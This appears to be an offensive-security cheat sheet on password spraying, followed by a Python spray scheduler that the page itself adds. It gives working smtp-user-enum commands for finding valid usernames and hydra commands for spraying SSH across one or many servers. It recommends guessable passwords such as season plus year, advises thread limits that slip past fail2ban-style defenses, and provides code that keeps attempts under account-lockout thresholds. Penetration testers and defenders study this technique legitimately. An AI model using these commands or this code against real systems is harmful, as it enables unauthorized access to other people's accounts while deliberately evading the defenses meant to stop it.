Password Spray
Rather than the usual dictionary brute force, which throws hundreds or even millions of password candidates at a single account, password spraying reverses the process: gather a list of as many valid users as possible and try just one password against tens or hundreds of accounts. Because lockout policies count failures per account, one attempt per user per round stays below the threshold that a per-account brute force would trip within seconds.
Here is a username list example:
https://github.com/insidetrust/statistically-likely-usernames
We can enumerate usernames using the SMTP VRFY method (take the first 50 candidates from the list as a starting point):
head -n 50 john.txt > users.txt
smtp-user-enum -M VRFY -U users.txt -t $IP
This is the same as the Metasploit module auxiliary/scanner/smtp/smtp_enum.
Now that we have validated some users, we should choose one (recommended) or two (maximum) commonly-used passwords for our attack; every additional password is one more failed attempt per account, so the list must stay short.
Regarding commonly used passwords, real-world experience has shown that one of the most common is the current season followed by the current year, e.g., Spring2022.
Another very common pattern is the company name followed by a numerical value, e.g., FooCorp01, FooCorp02, etc.
Spray a single server:
hydra -L users.txt -p <password> ssh://$IP -t 4
Spray multiple servers (one target per line in ssh_servers.txt; swap -l <username> for -L users.txt to spray a user list across all of them):
hydra -l <username> -p <password> -M ssh_servers.txt ssh -t 4
When brute-forcing SSH, keep hydra at 4 threads or fewer (-t 4). More parallel connections are likely to hit the server's MaxStartups limit or trip fail2ban-style defenses, and hydra itself prints a warning recommending -t 4 for the ssh module.
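The following is an added example, not code from the original page or from hydra: it puts the whole procedure above (generate the season/year and company-name candidates, then spray one password per round across every validated user) into a small scheduler that also accounts for lockouts. The lockout threshold of 5 failures per user in a 30-minute window, the user list and the fake login callback are all constructed assumptions; in practice the callback would be a real SSH or SMTP login.

```python
"""Password spray scheduler: added example, not code from the original page.

Assumptions (not from the page): a lockout threshold of 5 failed attempts per
user within a 30-minute window, a constructed list of users, and a fake
login callback that stands in for the real SSH/SMTP authentication that
hydra would perform.
"""
import datetime
import time
from typing import Callable, Dict, List


def season_password(date: datetime.date) -> str:
    """Build the 'current season + current year' candidate, e.g. Spring2022.

    Uses northern-hemisphere meteorological seasons (Dec-Feb = Winter, ...)."""
    seasons = ["Winter", "Spring", "Summer", "Autumn"]
    return f"{seasons[(date.month % 12) // 3]}{date.year}"


def company_passwords(company: str, count: int = 2) -> List[str]:
    """Build the 'CompanyName + counter' candidates, e.g. FooCorp01, FooCorp02."""
    return [f"{company}{n:02d}" for n in range(1, count + 1)]


class LockoutBudget:
    """Per-user attempt accounting so a spray never reaches the lockout threshold."""

    def __init__(self, lockout_threshold: int, window_seconds: float) -> None:
        self.lockout_threshold = lockout_threshold
        self.window_seconds = window_seconds
        self.attempts: Dict[str, List[float]] = {}

    def can_try(self, user: str, now: float) -> bool:
        # Keep only attempts that are still inside the observation window.
        recent = [t for t in self.attempts.get(user, []) if now - t < self.window_seconds]
        self.attempts[user] = recent
        # Stay one attempt below the threshold: the real user's own typo
        # could otherwise be the failure that locks the account.
        return len(recent) < self.lockout_threshold - 1

    def record(self, user: str, now: float) -> None:
        self.attempts.setdefault(user, []).append(now)


def spray(users: List[str], passwords: List[str],
          try_login: Callable[[str, str], bool], budget: LockoutBudget,
          clock: Callable[[], float] = time.time) -> Dict[str, str]:
    """One password per round against every user; returns {user: password} hits.

    Enforces the page's rule: one password is recommended, two is the maximum."""
    if not 1 <= len(passwords) <= 2:
        raise ValueError("spray with one (recommended) or two (maximum) passwords")
    found: Dict[str, str] = {}
    for password in passwords:          # outer loop: the single password for this round
        for user in users:              # inner loop: every user gets that one attempt
            if user in found:
                continue
            now = clock()
            if not budget.can_try(user, now):
                continue                # skip the user rather than risk locking them out
            budget.record(user, now)
            if try_login(user, password):
                found[user] = password
    return found


# Constructed demo data: a fake directory standing in for real SSH logins.
DEMO_USERS = ["alice", "bob", "carol", "dave"]
DEMO_CREDENTIALS = {"bob": "Spring2022", "carol": "FooCorp02"}


def demo_login(user: str, password: str) -> bool:
    """Fake authentication callback (assumption); replace with a real login in practice."""
    return DEMO_CREDENTIALS.get(user) == password


def run_demo() -> Dict[str, str]:
    """Season/year candidate for April 2022 plus FooCorp02, sprayed over the demo users."""
    candidates = [season_password(datetime.date(2022, 4, 1)), company_passwords("FooCorp")[1]]
    budget = LockoutBudget(lockout_threshold=5, window_seconds=30 * 60)
    return spray(DEMO_USERS, candidates, demo_login, budget)


if __name__ == "__main__":
    print(run_demo())   # {'bob': 'Spring2022', 'carol': 'FooCorp02'}
```

The loop order is the whole point: the password is the outer loop and the users the inner one, so each account sees at most one failure per round, and LockoutBudget refuses a user once another attempt would bring them within one failure of the assumed threshold inside the window. Hydra with -L users.txt -p <password> performs the same outer/inner ordering; what hydra does not do is the per-user lockout accounting, which is why the password list is kept to one or two entries.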